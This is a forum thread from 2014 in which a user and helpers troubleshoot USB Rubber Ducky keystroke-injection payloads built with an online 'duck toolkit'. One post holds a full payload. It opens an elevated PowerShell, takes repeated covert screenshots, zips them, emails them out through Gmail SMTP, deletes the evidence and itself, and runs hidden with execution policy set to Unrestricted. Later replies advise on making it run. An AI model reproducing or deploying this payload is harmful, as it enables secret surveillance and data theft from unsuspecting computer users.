duckyman662 Posted April 22, 2014 Share Posted April 22, 2014 I created a payload through duck toolkit and I choose the e-mail options, I enter my information correctly and when I run the duck on the computer for some reason different payloads open random folders and I get no reports, I wanted screenshots sent to my e-mail several times but no luck, I tried creating different payloads but it wont work for some reason. I drag and drop the bin file onto the SD card, insert into the ducky and put the ducky into the usb potr, but it runs really quickly despite slower delays like 30 extra seconds, proper keyboard layout (USA) and it's not working, any advice? Quote Link to comment Share on other sites More sharing options...
411Hall Posted April 24, 2014 Share Posted April 24, 2014 Hi sorry for the dely in my reply. So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time. 411. Quote Link to comment Share on other sites More sharing options...
duckyman662 Posted May 3, 2014 Author Share Posted May 3, 2014 Hi sorry for the dely in my reply. So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time. 411. The only payload that has worked is the Hello World payload, the rest will open random files and such. Quote Link to comment Share on other sites More sharing options...
KSI_Syn Posted May 4, 2014 Share Posted May 4, 2014 The only payload that has worked is the Hello World payload, the rest will open random files and such. What payloads are you attempting to run that are causing you issues. would give us a better idea of what may be going on if we knew what the code should be doing. Quote Link to comment Share on other sites More sharing options...
411Hall Posted May 7, 2014 Share Posted May 7, 2014 The only payload that has worked is the Hello World payload, the rest will open random files and such. Have you tried again since i added the new delay feature? You now choose exactly how much delay is on each script. So maybe try setting it to the max to see if that runs? If it does then it has to be a timing issue. 411. Quote Link to comment Share on other sites More sharing options...
duckyman662 Posted May 8, 2014 Author Share Posted May 8, 2014 DELAY 2750 GUI r DELAY 2750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 2750 ALT y DELAY 2750 ENTER ALT SPACE DELAY 2750 STRING m DELAY 2750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [System.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 15); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(''secret', 'secretpassword'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = ''secretemailhere@gmail.com'' ENTER STRING $ReportEmail.To.Add('secretemailhere@gmail.com') ENTER STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report' ENTER STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.' ENTER STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING remove-item 'C:\Windows\Report.zip' ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 2750 STRING C:\Windows\config-5077a.ps1 ENTER DELAY 2750 ALT F4 DELAY 2750 GUI r DELAY 2750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2750 ALT y DELAY 2750 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 2750 STRING m DELAY 2750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 2750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER Quote Link to comment Share on other sites More sharing options...
411Hall Posted May 8, 2014 Share Posted May 8, 2014 Soo did it not run? What operating system are you running? 411. Quote Link to comment Share on other sites More sharing options...
duckyman662 Posted May 27, 2014 Author Share Posted May 27, 2014 (edited) I get this error for just the screenshot with maximum delay selected from the duck toolkit website. 40000 united states, on my laptop. No idea why it doesnt work.. edit: thread title says 32 bit vista. I also tried on two separate computers, around 2010 laptops and a macbook air, no luck. Edited May 27, 2014 by duckyman662 Quote Link to comment Share on other sites More sharing options...
duckyman662 Posted May 31, 2014 Author Share Posted May 31, 2014 Also on both win/mac it just opens random files OR renames random program names/folders in Mac. Quote Link to comment Share on other sites More sharing options...
no42 Posted May 31, 2014 Share Posted May 31, 2014 sounds like a timing issue, alter the delays to be slightly longer Quote Link to comment Share on other sites More sharing options...
MB60893 Posted May 31, 2014 Share Posted May 31, 2014 If it is not a timing issue, try compiling the .bin file with the duckencoder online toolkit (411 created it. Works great and more reliable than the actual compiler.) Try that, and reformat the SD Card. That should work. If that doesn't work, then there may be a problem with your duck. Try pressing the button on the duck as well after a minute of the duck being plugged into the machine. That may mean the duck isn't properly recognised by the computer. The driver may not be installed correctly, or the duck may be faulty. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.